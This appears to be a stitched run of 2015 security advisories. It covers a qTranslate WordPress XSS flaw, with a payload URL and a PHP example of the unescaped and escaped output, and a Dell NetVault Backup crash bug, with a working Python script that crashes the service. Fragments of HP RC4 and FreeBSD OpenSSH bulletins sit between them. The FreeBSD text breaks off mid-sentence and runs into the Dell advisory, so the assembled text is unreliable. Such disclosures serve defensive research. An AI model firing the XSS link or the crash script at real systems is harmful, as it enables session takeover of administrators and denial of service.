Advisory ID: HTB23265
Product: qTranslate WordPress plugin
Vendor: Qian Qin
Vulnerable Version(s): 2.5.39 and probably prior
Tested Version: 2.5.39
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Public Disclosure: July 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-5535
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/)
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in the qTranslate WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. Successful exploitation may allow a remote attacker to gain complete control over the web application if the victim visits a malicious page containing an XSS exploit. This vulnerability can also be used to perform drive-by-download or phishing attacks against website administrators.
Input passed via the "edit" HTTP GET parameter to "/wp-admin/options-general.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
The simple exploit below displays a JS popup containing the word "ImmuniWeb":
http://wordpress/wp-admin/options-general.php?page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2Fscript%3E
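The following is an added illustration of the bug class behind HTB23265 (request data reflected into an HTML attribute without escaping) next to the WordPress-idiomatic fix using esc_attr(). It is not the plugin's code; the advisory does not show where the reflection occurs, so the template function names and markup are assumptions, and the stand-alone esc_attr() fallback is only for running the file outside WordPress.

```php
<?php
// Added example, not qTranslate's code. The advisory reports that the "edit"
// GET parameter is reflected on an admin page unescaped; the exact markup
// below is an assumed illustration of that class of bug.

// Outside WordPress, esc_attr() does not exist; define an equivalent so the
// file runs stand-alone. WordPress's own esc_attr() likewise encodes " ' < > &.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: raw request data concatenated into a quoted attribute.
function render_edit_field_vulnerable($edit) {
    return '<input type="text" name="edit" value="' . $edit . '">';
}

// Hardened pattern: attribute-context escaping applied at the point of output.
function render_edit_field_fixed($edit) {
    return '<input type="text" name="edit" value="' . esc_attr($edit) . '">';
}

// Constructed input: the query string from the advisory's PoC URL, URL-decoded
// by parse_str() exactly as PHP decodes $_GET.
$query = 'page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2Fscript%3E';
parse_str($query, $params);
$edit = $params['edit'];

echo "Vulnerable: " . render_edit_field_vulnerable($edit) . PHP_EOL;
// The leading " closes value="" and the following > closes the <input> tag,
// so the <script> element lands in the page as live markup.
echo "Fixed:      " . render_edit_field_fixed($edit) . PHP_EOL;
// Here " < > become &quot; &lt; &gt; and the whole payload stays inside value.
```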
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04726896
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04726896
Version: 1
HPSBGN03366 rev.1 - HP Business Process Insight with RC4 Stream Cipher, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-07-29
Last Updated: 2015-07-29
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Business
Process Insight.
This is the RC4 vulnerability known as the Bar Mitzvah attack, which could be
exploited remotely to allow disclosure of information.
=============================================================================
FreeBSD-SA-15:16.openssh Security Advisory
The FreeBSD Project
Topic: OpenSSH multiple vulnerabilities
Category: contrib
Module: openssh
Announced: 2015-07-28, revised on 2015-07-30
Affects: All supported versions of FreeBSD.
Corrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE)
2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2)
2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1)
2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16)
2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)
2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)
2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE)
2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36)
CVE Name: CVE-2014-2653, CVE-2015-5600
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
0. Revision history
v1.0 2015-02-25 Initial release.
v1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24
-----------------------------------------------------------------------------------------------
Advisory Details:
While reverse engineering the protocol, several ways were found to crash the nvpmgr.exe process. The entire application (all processes) dies and cannot restart by itself unless someone restarts it manually.
Proof of concept script:
#!/usr/bin/python
import socket as so

server = "192.168.140.130"  # address of the NetVault host under test
port = 20031                # port the nvpmgr.exe service listens on

# Byte literals so the same script runs under both Python 2 and Python 3.
d = b"\x18\x00\x00\x00"
d += b"\x01"
#d += b"\xCB\x22\x77\xC9" # Another crash example
d += b"\x18\xE8\xBE\xC8" # Will cause the crash
d += b"\x0B\x00\x00\x00" + b"AAAA" + b"B" * 6
d += b"\x00" # null byte
##
# send it
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.sendall(d)
s.close()
-----------------------------------------------------------------------------------------------
Solution:
Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.
The fix done by Dell was not checked by the researcher.
-----------------------------------------------------------------------------------------------